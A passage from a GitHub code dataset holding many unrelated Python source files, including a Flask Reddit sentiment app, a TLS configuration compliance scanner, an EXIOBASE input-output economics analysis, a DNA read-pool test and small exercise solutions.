{}\r\n\r\n@app.route('/')\r\ndef get_main():\r\n return send_from_directory(static_file_dir, 'index.html')\r\n \r\n@app.route('/analyze_sentiment')\r\ndef analyze_sentiment():\r\n global config\r\n query = request.args.get('query')\r\n sid = SentimentIntensityAnalyzer()\r\n r = requests.get(config['reddit.api'] + query)\r\n posts = json.loads(r.text)['data']\r\n positive = SentimentResult()\r\n negative = SentimentResult()\r\n neutral = SentimentResult()\r\n for post in posts:\r\n full_link = post['full_link']\r\n \r\n if 'selftext' not in post.keys():\r\n continue\r\n \r\n selftext = post['selftext']\r\n sentences = sent_tokenize(selftext)\r\n for i in range(len(sentences)):\r\n sentence = sentences[i]\r\n if query in sentence: \r\n score = sid.polarity_scores(sentence)['compound']\r\n post_result = dict()\r\n post_result['score'] = score\r\n post_result['text'] = sentence\r\n post_result['link'] = post['full_link']\r\n \r\n if score < -0.05:\r\n negative.add_post(post_result)\r\n elif score > 0.05:\r\n positive.add_post(post_result)\r\n else:\r\n neutral.add_post(post_result)\r\n positive.trim_list()\r\n negative.trim_list()\r\n neutral.trim_list()\r\n \r\n return '{ \"positive\":' + json.dumps(positive.__dict__) + ', \"negative\":' + json.dumps(negative.__dict__) + ', \"neutral\":' + json.dumps(neutral.__dict__) + '}'\r\n\r\ndef read_config(config_file):\r\n global config\r\n with open(config_file, 'r') as stream:\r\n try:\r\n config = yaml.safe_load(stream)\r\n except yaml.YAMLError as exc:\r\n raise exc\r\n\r\nif __name__ == '__main__':\r\n read_config(\"config.yaml\")\r\n serve(app, host='0.0.0.0', port=5000)","repo_name":"cpetroaca/ibs-sentiment-analysis","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"32040571444","text":"\n# 형태소만 뽑아 저장\nstopwords = ['은','는','가','하','아','것','들','의','되','수','보','주','등','한']\n\ndef tense_tokenizer(sentence, pos=[\"J\",\"E\"], stopword=stopwords): \n\n from konlpy.tag import Hannanum\n hannanum = Hannanum()\n\n sentence = [word for word, tag in hannanum.pos(sentence) if len(word) > 0 and tag in pos and word not in stopword]\n\n return sentence\n\n\n# tfidf, model\ndef tense_ml(sentence):\n\n import joblib\n\n loaded_vectorizer = joblib.load('./tense_vectorizer_customized.pkl') \n loaded_model = joblib.load('./tense_model_customized.pkl') \n\n #df_token_list = [str(x).lower() for x in df]\n df_token = tense_tokenizer(sentence) \n df_tfidf = loaded_vectorizer.transform(df_token)\n\n pred = loaded_model.predict(df_tfidf)\n pred = pred[-1]\n\n return pred\n\nif __name__ == \"__main__\":\n print(tense_ml('김금희 소설가는 "계약서 조정이 그리 어려운가 작가를 격려한다면서 그런 문구 하나 고치기가 어려운가 작가의 노고와 권리를 존중해줄 수 있는 것 아닌가"라고 꼬집었다.'))\n","repo_name":"tmdqja75/ml_nlp_project","sub_path":"tense_yeram/fin_tense.py","file_name":"fin_tense.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74931966441","text":"\nimport os\nimport spotipy\nfrom json.decoder import JSONDecodeError\nimport spotipy.util as util\n\ndef Spotify_auth(client_id, client_secret):\n \"\"\"Required to use Spotify's API start with this always must pass a client ID & client secret\"\"\"\n try:\n token = util.prompt_for_user_token(\"Alvin Chung\",\n client_id=client_id,\n client_secret=client_secret,\n redirect_uri=\"https://example.com/callback/\")\n except (AttributeError, JSONDecodeError):\n os.remove(f\".cache-Alvin Chung\")\n token = util.prompt_for_user_token(\"Alvin Chung\",\n client_id=client_id,\n client_secret=client_secret,\n redirect_uri=\"https://example.com/callback/\")\n\n\n spotify = spotipy.Spotify(auth=token)\n return spotify\n\n","repo_name":"togobingi/spotifyMe","sub_path":"auth/authentication.py","file_name":"authentication.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"9751981950","text":"def balance(root):\n if(root is None):\n return (0,True)\n else:\n lv1,l=balance(root.left)\n lv2,r=balance(root.right)\n if(l==False or r==False):\n return -1,False\n m=max(lv1,lv2)\n if(abs(lv1-lv2)<=1):\n x=True\n return (m+1,True)\n else:\n return -1,False\n \n\nclass Solution(object):\n def isBalanced(self, root):\n return balance(root)[1]\n","repo_name":"AumkarG/Algorithms-and-Data-Structures","sub_path":"LeetCode/Trees/Balanced Binary Tree_372584751.py","file_name":"Balanced Binary Tree_372584751.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7008171271","text":"import pprint\nfrom vehicle.train import Train\nfrom vehicle.airbus import Airbus\n\n\ntrain1 = Train(60,20,100000 , 70, 20)\ntrain1.set_color('Blue')\ntrain1.pretty_print()\n\n\n\nairbus1 = Airbus(\n speed=1000,\n old=10,\n price=30000000,\n tank_volume=20,\n fuel_consumption=1\n)\nairbus1.set_color('Green')\nairbus1.pretty_print()","repo_name":"Terehov2088/HomeWork1-10","sub_path":"36.py","file_name":"36.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23546821120","text":"def main():\n print(\"Welcome to My To-Do List App!\")\n tasks = []\n \n while True:\n print(\"\\n1. Add Task\")\n print(\"2. View Tasks\")\n print(\"3. Quit\")\n \n choice = input(\"Enter your choice: \")\n \n if choice == '1':\n task = input(\"Enter a new task: \")\n tasks.append(task)\n function_1()\n elif choice == '2':\n print(\"\\n--- Your Tasks ---\")\n for index, task in enumerate(tasks, start=1):\n print(f\"{index}. {task}\")\n elif choice == '3':\n function_n()\n break\n else:\n function_2()\n\ndef function_1():\n print(\"Task added successfully!\")\n return \ndef function_2():\n print(\"Please Type '1','2',or'3'\")\n return\ndef function_n():\n print(\"Goodbye!\")\n return\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"sem2093/HarvardCS50P","sub_path":"final-project/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70609167399","text":"import os\n\nxml_pred_dir = './data/plate_data/test/xml_pred'\noutput_dir = './data/plate_data/test/output'\n\ndef write_plate_data(xml_file, platetext, xmin, ymin, xmax, ymax):\n print(\"Writing to\", xml_file)\n data = f'' \\\n\t f'{platetext}' \\\n\t\t f''\\\n\t\t f'{xmin}' \\\n\t\t f'{ymin}' \\\n\t\t f'{xmax}' \\\n\t\t f'{ymax}' \\\n\t\t f'' \\\n\t f''\n with open(xml_file, 'w') as f:\n f.write(data)\n\nif __name__ == '__main__':\n # Read bouding box and platetext from .txt files in output folder\n # then write to xml file \n if not os.path.exists(xml_pred_dir):\n os.makedirs(xml_pred_dir)\n for idx in range(1, 101):\n with open(os.path.join(output_dir, str(idx)+'.txt'), 'r') as f:\n xmin, ymin, xmax, ymax = map(int, f.readline().split())\n with open(os.path.join(output_dir, str(idx)+'_text.txt'), 'r') as f:\n label = f.readline()\n write_plate_data(os.path.join(xml_pred_dir, str(idx)+'.xml'), label, xmin, ymin, xmax, ymax)\n ","repo_name":"hoangmaihuy/license_plate_recognition","sub_path":"data/convert_test_output.py","file_name":"convert_test_output.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"10535611404","text":"import sys\n\ninput = sys.stdin.readline\n\nN, M, k = map(int, input().split())\nparents = [i for i in range(N+1)]\ncheck = [False for i in range(N+1)]\nsum_val = 0\n\ndef find(v):\n if v == parents[v]:\n return v\n parents[v] = find(parents[v])\n return parents[v]\n\ndef union(u, v):\n u = find(u)\n v = find(v)\n if u == v:\n return False\n if(cost[u] >= cost[v]):\n parents[u] = v\n else:\n parents[v] = u\n return True\n\ncost = [0]+ list(map(int, input().split()))\nfor _ in range(M):\n u, v = map(int, input().split())\n union(u, v)\n\nfor i in range(1, N+1):\n find(i)\n\nfor i in range(1, N+1):\n if check[parents[i]]:\n continue\n sum_val += cost[parents[i]]\n check[parents[i]] = True\n\nif k >= sum_val:\n print(sum_val)\nelse:\n print('Oh no')","repo_name":"tsinghua-auto4/ct_note","sub_path":"BOJ/2304/26/이경훈_16562_친구비.py","file_name":"이경훈_16562_친구비.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"4596209763","text":"from prev_ob_models.utils import RunInClassDirectory, IsolatedCell\r\n\r\nclass MC(IsolatedCell):\r\n def __init__(self):\r\n with RunInClassDirectory(MC):\r\n from neuron import h,gui\r\n\r\n h.xopen(\"mitral.hoc\")\r\n h.xopen(\"memb.hoc\")\r\n\r\n h.celsius = 23\r\n\r\n self.h = h\r\n self.soma = self.h.soma\r\n\r\n h.cvode_active(1)\r\n\r\n\r\n\r\n\r\n","repo_name":"JustasB/OlfactoryBulb","sub_path":"prev_ob_models/Shen1999/isolated_cells.py","file_name":"isolated_cells.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"18"} +{"seq_id":"28431893398","text":"import socket\nimport time\nimport subprocess\nimport traceback\nimport copy\nfrom time import sleep\nfrom utils.output import Output\nfrom utils.db import DB\nimport dataclasses\n\nfrom sslyze import *\nimport sslyze\nfrom sslyze.mozilla_tls_profile.mozilla_config_checker import (\n MozillaTlsConfigurationChecker,\n ServerNotCompliantWithMozillaTlsConfiguration,\n ServerScanResultIncomplete,\n)\nfrom sslyze.mozilla_tls_profile.mozilla_config_checker import MozillaTlsConfigurationEnum\nfrom sslyze.plugins.session_renegotiation_plugin import SessionRenegotiationScanResult\nfrom sslyze.scanner.models import SessionRenegotiationScanAttempt\n\n\ndef tlsscan_worker(target, tls_config, timeout):\n\n retry = 0\n while True:\n try:\n server_location = ServerNetworkLocation(hostname=target['hostname'], port=target['port'])\n request = ServerScanRequest(server_location=server_location, network_configuration=ServerNetworkConfiguration(server_location.hostname, network_timeout=timeout))\n except sslyze.errors.ServerHostnameCouldNotBeResolved:\n Output.error({'target': 'ssl://%s:%d' % (target['hostname'], target['port']), 'message': 'Not resolved'}) \n\n return\n\n scanner = Scanner()\n scanner.queue_scans([request])\n res = next(scanner.get_results())\n\n if res.scan_status == ServerScanStatusEnum.ERROR_NO_CONNECTIVITY:\n Output.error({'target': 'ssl://%s:%d' % (target['hostname'], target['port']), 'message': 'No conn'}) \n return\n\n # In some cases, session_renegotiation required a client certificate. This means sslyze won't like it and will not display the results, hack it\n test = getattr(res.scan_result, ScanCommand.SESSION_RENEGOTIATION.value)\n if test.status == ScanCommandAttemptStatusEnum.ERROR:\n result = res.scan_result\n\n new_result = dataclasses.replace(result, session_renegotiation=SessionRenegotiationScanAttempt(status=ScanCommandAttemptStatusEnum.COMPLETED, error_reason=None, error_trace=None, result=SessionRenegotiationScanResult(supports_secure_renegotiation=True, is_vulnerable_to_client_renegotiation_dos=False)))\n\n new_res = dataclasses.replace(res, scan_result=new_result)\n\n res = new_res\n\n mozilla_checker = MozillaTlsConfigurationChecker.get_default()\n try:\n if tls_config == 'old':\n mozilla_config = MozillaTlsConfigurationEnum.OLD\n elif tls_config == 'intermediate':\n mozilla_config = MozillaTlsConfigurationEnum.INTERMEDIATE\n elif tls_config == 'modern':\n mozilla_config = MozillaTlsConfigurationEnum.MODERN\n else:\n raise NotImplementedError()\n \n mozilla_checker.check_server(against_config=mozilla_config, server_scan_result=res)\n\n Output.success({'target': 'ssl://%s:%d' % (target['hostname'], target['port']), 'message': 'TLS: Certificate compliant with Mozilla\\'s %s configuration' % tls_config}) \n except ServerNotCompliantWithMozillaTlsConfiguration as e:\n Output.vuln({'target': 'ssl://%s:%d' % (target['hostname'], target['port']), 'message': 'TLS: Certificate not compliant with Mozilla\\'s %s configuration' % tls_config}) \n\n for criteria, error_description in e.issues.items():\n Output.vuln({'target': 'ssl://%s:%d' % (target['hostname'], target['port']), 'message': ' - %s: %s' % (criteria, error_description)}) \n vuln_info = {\n 'hostname': target['hostname'],\n 'port': target['port'],\n 'service': 'ssl',\n 'url': 'ssl://%s:%d' % (target['hostname'], target['port']),\n 'name': '%s: %s' % (tls_config, criteria),\n 'description': error_description,\n }\n DB.insert_vulnerability(vuln_info)\n except ServerScanResultIncomplete as e:\n\n if retry < 3:\n retry += 1\n time.sleep(1)\n continue\n else:\n Output.error({'target': 'ssl://%s:%d' % (target['hostname'], target['port']), 'message': 'Scan did not run successfully: %s' % str(e)}) \n\n break\n\n\n\n\n","repo_name":"hegusung/netscan","sub_path":"scripts/lib/tlsscan/tlsscan.py","file_name":"tlsscan.py","file_ext":"py","file_size_in_byte":4298,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"18"} +{"seq_id":"29281427678","text":"from selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import Select\r\nimport time\r\n\r\nclass jay:\r\n driver = webdriver.Chrome()\r\n\r\n def display_per_pages(self):\r\n self.driver.get('https://www.imdb.com/search/title/')\r\n self.driver.maximize_window\r\n user_ratings = self.driver.find_element(by = By.NAME, value = 'user_rating-min')\r\n user_ratings_dropdown = Select(user_ratings)\r\n user_ratings_dropdown.select_by_visible_text('6.3')\r\n display_ratings = self.driver.find_element(by = By.NAME, value = 'count')\r\n display_ratings_dropdown = Select(display_ratings)\r\n display_ratings_dropdown.select_by_visible_text('250 per page')\r\n display_ratings.click()\r\n time.sleep(9)\r\n submit_button = self.driver.find_element(by = By.XPATH, value = '//*[@id=\"main\"]/p[3]/button')\r\n submit_button.click()\r\n time.sleep(14)\r\n\r\ns = jay()\r\n\r\ns.display_per_pages()","repo_name":"prakash2196/prakash2196","sub_path":"zen_class_workouts/fun34.py","file_name":"fun34.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72904572840","text":"import os\n\ndef walkfiles(dir):\n for root, dirs, files in os.walk(dir):\n #for f in files:\n # print(os.path.join(root, f))\n for d in dirs:\n print(os.path.join(root, d))\ndef update_dirs(dir):\n model = \"cd @DIR ; git remote update ; cd -\"\n dirs = os.listdir(dir)\n for d in dirs:\n if os.path.isdir(d):\n model_t = model.replace(\"@DIR\", d)\n print(model_t)\n os.system(model_t)\ndef main():\n #walkfiles(\".\")\n update_dirs(\".\")\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"Henry-Hwang/hvim","sub_path":"git-update.py","file_name":"git-update.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"35618669637","text":"import re\nfrom os import environ\n\nid_pattern = re.compile(r'^.\\d+$')\ndef is_enabled(value, default):\n if value.lower() in [\"true\", \"yes\", \"1\", \"enable\", \"y\"]:\n return True\n elif value.lower() in [\"false\", \"no\", \"0\", \"disable\", \"n\"]:\n return False\n else:\n return default\n\n\nLONG_IMDB_DESCRIPTION = is_enabled(environ.get(\"LONG_IMDB_DESCRIPTION\", \"False\"), False)\nMAX_LIST_ELM = environ.get(\"MAX_LIST_ELM\", None)\nIMDB = is_enabled((environ.get('IMDB', \"True\")), True)\n","repo_name":"Lallu-lallus/baby_groot","sub_path":"info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4698319470","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[4]:\n\n\n#Get libraries \n\nfrom matplotlib.pyplot import title\nimport pymrio\nimport pandas \nimport numpy as np\nimport pandas as pd\n\n\n#Write Input for analysis \n\n#two letter code for country \nCountry = 'FR'\n\nghg = 'GHG emissions (GWP100) | Problem oriented approach: baseline (CML, 2001) | GWP100 (IPCC, 2007)'\n\n\n# ## Get the Leonfeif Inverse and merge into one dataframe to compare, get top 20 values\n\n# In[5]:\n\n\n#Load EXIOBASE 1996\nexio3_1996 = pymrio.parse_exiobase3(path='IOT_1996_pxp.zip')\nexio3_1996.calc_all()\n#Load EXIOBASE 1998\nexio3_1998 = pymrio.parse_exiobase3(path='IOT_1998_pxp.zip')\nexio3_1998.calc_all()\n#Load EXIOBASE 2000\nexio3_2000 = pymrio.parse_exiobase3(path='IOT_2000_pxp.zip')\nexio3_2000.calc_all()\n#Load EXIOBASE 2002\nexio3_2002 = pymrio.parse_exiobase3(path='IOT_2002_pxp.zip')\nexio3_2002.calc_all()\n#Load EXIOBASE 2004\nexio3_2004 = pymrio.parse_exiobase3(path='IOT_2004_pxp.zip')\nexio3_2004.calc_all()\n#Load EXIOBASE 2006\nexio3_2006 = pymrio.parse_exiobase3(path='IOT_2006_pxp.zip')\nexio3_2006.calc_all()\n#Load EXIOBASE 2008\nexio3_2008 = pymrio.parse_exiobase3(path='IOT_2008_pxp.zip')\nexio3_2008.calc_all()\n#Load EXIOBASE 2010\nexio3_2010 = pymrio.parse_exiobase3(path='IOT_2010_pxp.zip')\nexio3_2010.calc_all()\n#Load EXIOBASE 2012\nexio3_2012 = pymrio.parse_exiobase3(path='IOT_2012_pxp.zip')\nexio3_2012.calc_all()\n#Load EXIOBASE 2014\nexio3_2014 = pymrio.parse_exiobase3(path='IOT_2014_pxp.zip')\nexio3_2014.calc_all()\n#Load EXIOBASE 2016\nexio3_2016 = pymrio.parse_exiobase3(path='IOT_2016_pxp.zip')\nexio3_2016.calc_all()\n#Load EXIOBASE 2018\nexio3_2018 = pymrio.parse_exiobase3(path='IOT_2018_pxp.zip')\nexio3_2018.calc_all()\n#load EXIOBASE 2020\nexio3_2020 = pymrio.parse_exiobase3(path='IOT_2020_pxp.zip')\nexio3_2020.calc_all()\n#load EXIOBASE 2022\nexio3_2022 = pymrio.parse_exiobase3(path='IOT_2022_pxp.zip')\nexio3_2022.calc_all()\n\n\n# In[8]:\n\n\n##Define Leonteif inverse for Each each year\n\n#L matrix For 1996\nL_1996 = exio3_1996.L[Country]\nL_1998 = exio3_1998.L[Country]\nL_2000 = exio3_2000.L[Country]\nL_2002 = exio3_2002.L[Country]\nL_2004 = exio3_2004.L[Country]\nL_2006 = exio3_2006.L[Country]\nL_2008 = exio3_2008.L[Country]\nL_2010 = exio3_2010.L[Country]\nL_2012 = exio3_2012.L[Country]\nL_2014 = exio3_2014.L[Country]\nL_2016 = exio3_2016.L[Country]\nL_2018 = exio3_2018.L[Country]\nL_2020 = exio3_2020.L[Country]\nL_2022 = exio3_2022.L[Country]\n\n\n# In[34]:\n\n\n#get Leontief for agriculture\nL_Agr_1996 = L_1996.iloc[:, 0:15]\nL_Agr_1998 = L_1998.iloc[:, 0:15]\nL_Agr_2000 = L_2000.iloc[:, 0:15]\nL_Agr_2002 = L_2002.iloc[:, 0:15]\nL_Agr_2004 = L_2004.iloc[:, 0:15]\nL_Agr_2006 = L_2006.iloc[:, 0:15]\nL_Agr_2008 = L_2008.iloc[:, 0:15]\nL_Agr_2010 = L_2010.iloc[:, 0:15]\nL_Agr_2012 = L_2012.iloc[:, 0:15]\nL_Agr_2014 = L_2014.iloc[:, 0:15]\nL_Agr_2016 = L_2016.iloc[:, 0:15]\nL_Agr_2018 = L_2018.iloc[:, 0:15]\nL_Agr_2020 = L_2020.iloc[:, 0:15]\nL_Agr_2022 = L_2022.iloc[:, 0:15]\n\n\n# In[72]:\n\n\n#L_Agr_1996.groupby('sector')['Paddy rice'].nlargest(20)\n\nsector = 'Oil seeds'\n\n#1996\nd = L_Agr_1996[sector].nlargest(10)\nd = pd.DataFrame(data=d)\nd.plot(kind='bar',title = sector +' Leontief Matrix- 1996', fontsize= 10)\n\n\n# In[73]:\n\n\n#2022\nd2 = L_Agr_2022[sector].nlargest(10)\nd2 = pd.DataFrame(data=d2)\nd2.plot(kind='bar',title = sector +' Leontief Matrix- 2022', fontsize= 10)\n\n\n# In[100]:\n\n\n#Total Intermediate demand for 1996 per sector\nFrance_output = exio3_1996.Z.loc[Country]\nFrance_Agr_output = France_output.iloc[0:15]\nTotal_Intermediate_1996 = France_Agr_output.sum(axis=1)\n\n#Total final demad 1996\nFinal_demand_FR = exio3_1996.Y.loc[Country]\nFinal_demand_FR_agr = Final_demand_FR.iloc[0:15]\nTotal_Finaldemand_1996 = Final_demand_FR_agr.sum(axis=1)\n\n#merge and plot\ndata_Z = { 'Intermediate':Total_Intermediate_1996, 'Final Demand':Total_Finaldemand_1996}\nCompare = pd.DataFrame(data=data_Z )\nCompare.plot(kind='bar', title = 'Intermediate vs Final Demand- 1996')\n\n\n# In[139]:\n\n\n#Total Intermediate demand for 2022 per sector\nFrance_output_22 = exio3_2022.Z.loc[Country]\nFrance_Agr_output22 = France_output_22.iloc[0:15]\nTotal_Intermediate_2022 = France_Agr_output22.sum(axis=1)\n\n#Total final demad 2022\nFinal_demand_FR22 = exio3_2022.Y.loc[Country]\nFinal_demand_FR_agr22 = Final_demand_FR22.iloc[0:15]\nTotal_Finaldemand_2022 = Final_demand_FR_agr22.sum(axis=1)\n\n#merge and plot\ndata_Z22 = { 'Intermediate':Total_Intermediate_2022, 'Final Demand':Total_Finaldemand_2022}\nCompare22 = pd.DataFrame(data=data_Z22 )\nCompare22.plot(kind='bar', title = 'Intermediate vs Final Demand- 2022')\n\n\n# In[141]:\n\n\n#Find Exports as a percentage of total output of French Agriculture 1996\n\n#1996 total ouptput\nX_1996 = Total_Intermediate_1996 + Total_Finaldemand_1996\n\n#calculate french intermediate consumption\nFrance_output = exio3_1996.Z.loc[Country]\nFrance_agr_Z = France_output[Country]\nFZ_96 = France_agr_Z.iloc[0:15].sum(axis=1)\n\n#calculate french final demand consumption\nFrench_Y = exio3_1996.Y.loc[Country]\nFrench_Y = French_Y[Country]\nFrench_Y_agr = French_Y.iloc[0:15].sum(axis=1)\n\n#Calculate french consumption as a portion of total agricultural output -1996\nconsumption = French_Y_agr + FZ_96\nratio_1996 = consumption/X_1996\nratio_1996\n\n\n# In[142]:\n\n\n#Find Exports as a percentage of total output of French Agriculture - 2022\n\n#2022 total ouptput\nX_2022 = Total_Finaldemand_2022 + Total_Intermediate_2022\n\n#calculate french intermediate consumption\nFrance_output = exio3_2022.Z.loc[Country]\nFrance_agr_Z = France_output[Country]\nFZ_22 = France_agr_Z.iloc[0:15].sum(axis=1)\n\n#calculate french final demand consumption\nFrench_Y = exio3_2022.Y.loc[Country]\nFrench_Y = French_Y[Country]\nFrench_Y_agr22 = French_Y.iloc[0:15].sum(axis=1)\n\n#Calculate french consumption as a portion of total agricultural output -1996\nconsumption22 = French_Y_agr22 + FZ_22\nratio_2022 = consumption22/X_2022\n\n\n# In[144]:\n\n\n#Percentage of Total Domestic consumption of French agriculture goods\n\n#merge and plot\nconsumptiondata = { '1996':ratio_1996, '2022':ratio_2022}\nConsumption_agr = pd.DataFrame(data=consumptiondata )\nConsumption_agr.plot(kind='bar', title = 'Portion of Domestic Consumption for French Agricultural Products')\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"MohamedhBadr/EXIO_env_intensity","sub_path":"Leontief- French agr.py","file_name":"Leontief- French agr.py","file_ext":"py","file_size_in_byte":6177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14680863744","text":"# Escreva um programa que receba um número inteiro na entrada e verifique se o número recebido possui ao menos um dígito com um dígito adjacente igual a ele. Caso exista, imprima \"sim\"; se não existir, imprima \"não\".\nn = int(input(\"Digite um valor para n: \"))\nx = 10\ny = 1\nsum = 0\nwhile(n//x != 0): \n x = x * 10\n y = y + 1\nx = x//10\nant = n//x\nn = n - x * ant\nx = x//10\ny = y - 1 \nresp = False\nwhile(y > 0):\n prox = n//x\n if(ant == prox): resp = True\n ant = prox\n sum = sum + (n//x)\n n = n - x * ant\n x = x//10\n y = y - 1\nif resp: print(\"sim\")\nelse: print(\"não\")","repo_name":"Minji0h/Introduce-at-CCO-with-python","sub_path":"Semana4/exercicio5.py","file_name":"exercicio5.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27048547523","text":"\"\"\"\nMultistage Graphs :- Directed, weighted graph in which nodes can be divided in stages.\n\"\"\"\nfrom math import inf\n\n\nclass GraphShortestPath:\n def __init__(self, graph, number_of_node, stages):\n self.graph = graph\n self.number_of_node = number_of_node\n self.stages = stages\n\n def shortest_path_and_cost(self):\n cost_data = [0 for _ in range(self.number_of_node)]\n destination_vertex = [0 for _ in range(self.number_of_node)]\n path = [0 for _ in range(self.stages)]\n\n cost_data[-1] = 0\n destination_vertex[-1] = self.number_of_node-1\n\n for possible_vertex in range(self.number_of_node-2, -1, -1):\n local_minimum_possible_cost = inf\n\n for neighbour_vertex in range(possible_vertex, self.number_of_node):\n cost = self.graph[possible_vertex][neighbour_vertex] + cost_data[neighbour_vertex]\n\n if self.graph[possible_vertex][neighbour_vertex] != 0 and cost < local_minimum_possible_cost:\n local_minimum_possible_cost = cost\n destination_vertex[possible_vertex] = neighbour_vertex\n\n cost_data[possible_vertex] = local_minimum_possible_cost\n\n path[0] = 0\n for stage in range(1, self.stages):\n path[stage] = destination_vertex[path[stage-1]]\n return cost_data[0], path\n\n\n\n\n\n\n","repo_name":"sweta-chauhan/Algorithms","sub_path":"src/algorithms/dynamic_programming/multistage_graphs.py","file_name":"multistage_graphs.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"73458205480","text":"import pytest\nimport numpy as np\nfrom Bio import SeqIO\nfrom Bio.Seq import Seq\n\nfrom simreaduntil.shared_utils.dna import get_random_DNA_seq\nfrom simreaduntil.simulator.readpool import ReadPoolFromIterable, ReadPoolFromIterablePerChannel, ReadPoolFromFile, reads_from_file_gen, NoReadLeft\n\ngen_from_list = pytest.helpers.gen_from_list\n\n\n@pytest.fixture\ndef dummy_reads_fasta(tmp_path):\n \"\"\"\n Creates a dummy fasta file with reads\n \"\"\"\n filename = tmp_path / \"test111.fasta\"\n with open(filename, \"w\") as f:\n SeqIO.write(SeqIO.SeqRecord(Seq(\"AAACCTGG\"), id=\"read1\"), f, \"fasta\")\n SeqIO.write(SeqIO.SeqRecord(Seq(\"CCCCCGGTT\"), id=\"read2\"), f, \"fasta\")\n return filename\n \n \ndef test_ReadPoolFromIterable():\n # read sequences from list/generator\n read_pool = ReadPoolFromIterable(gen_from_list(((\"read1\", \"GGGAAATCCGAA\"), (\"read2\", \"AAACCTGGTTAGG\"))))\n assert read_pool.nb_reads_returned == 0\n assert read_pool.get_new_read() == (\"read1\", \"GGGAAATCCGAA\")\n assert read_pool.nb_reads_returned == 1\n assert read_pool.get_new_read() == (\"read2\", \"AAACCTGGTTAGG\")\n assert read_pool.nb_reads_returned == 2\n with pytest.raises(NoReadLeft):\n read_pool.get_new_read()\n assert read_pool.nb_reads_returned == 2\n \ndef test_ReadPoolFromIterablePerChannel():\n random_state = np.random.default_rng(2)\n random_seqs_gen_from_lens = lambda lengths: (get_random_DNA_seq(n=n, random_state=random_state) for n in lengths)\n \n read_pool = ReadPoolFromIterablePerChannel({1: random_seqs_gen_from_lens([2, 3, 5]), 2: random_seqs_gen_from_lens([8, 9])})\n with pytest.raises(KeyError):\n read_pool.get_new_read()\n \n assert len(read_pool.get_new_read(1)) == 2\n assert len(read_pool.get_new_read(2)) == 8\n assert len(read_pool.get_new_read(1)) == 3\n assert len(read_pool.get_new_read(1)) == 5\n with pytest.raises(NoReadLeft):\n read_pool.get_new_read(1)\n # do twice\n with pytest.raises(NoReadLeft):\n read_pool.get_new_read(1)\n \n assert len(read_pool.get_new_read(2)) == 9\n with pytest.raises(NoReadLeft):\n read_pool.get_new_read(2)\n \ndef test_reads_from_file_gen(dummy_reads_fasta):\n # no shuffle\n assert list(reads_from_file_gen(dummy_reads_fasta)) == [('read1', 'AAACCTGG'), ('read2', 'CCCCCGGTT')]\n \n random_state = np.random.default_rng(2)\n assert list(reads_from_file_gen(dummy_reads_fasta, shuffle_rand_state=random_state)) == [('read1', 'AAACCTGG'), ('read2', 'CCCCCGGTT')]\n random_state = np.random.default_rng(5)\n assert list(reads_from_file_gen(dummy_reads_fasta, shuffle_rand_state=random_state)) == [('read2', 'CCCCCGGTT'), ('read1', 'AAACCTGG')]\n \ndef test_ReadPoolFromFile(dummy_reads_fasta):\n read_pool = ReadPoolFromFile(dummy_reads_fasta)\n assert not read_pool.definitely_empty\n \n print(read_pool)\n \n assert read_pool.get_new_read() == (\"read1\", \"AAACCTGG\")\n assert read_pool.get_new_read() == (\"read2\", \"CCCCCGGTT\")\n with pytest.raises(NoReadLeft):\n read_pool.get_new_read()\n assert read_pool.definitely_empty\n \n","repo_name":"ratschlab/sim_read_until","sub_path":"tests/simulator/test_readpool.py","file_name":"test_readpool.py","file_ext":"py","file_size_in_byte":3133,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"10177496984","text":"\"\"\"Your task is to write methods that return the highest score from the list, \nthe last added score and the three highest scores.\"\"\"\n\nclass HighScores:\n def __init__(self, scores):\n self.scores = scores\n\n def latest(self):\n return self.scores[-1]\n\n def personal_best(self):\n return max(self.scores)\n\n def personal_top_three(self):\n temp = self.scores [:]\n for i in temp:\n if len(temp) >= 3:\n temp.sort()\n temp.reverse()\n return temp [0:3]\n elif 0 < len(temp) and len(temp) < 3:\n temp.sort()\n temp.reverse()\n return temp 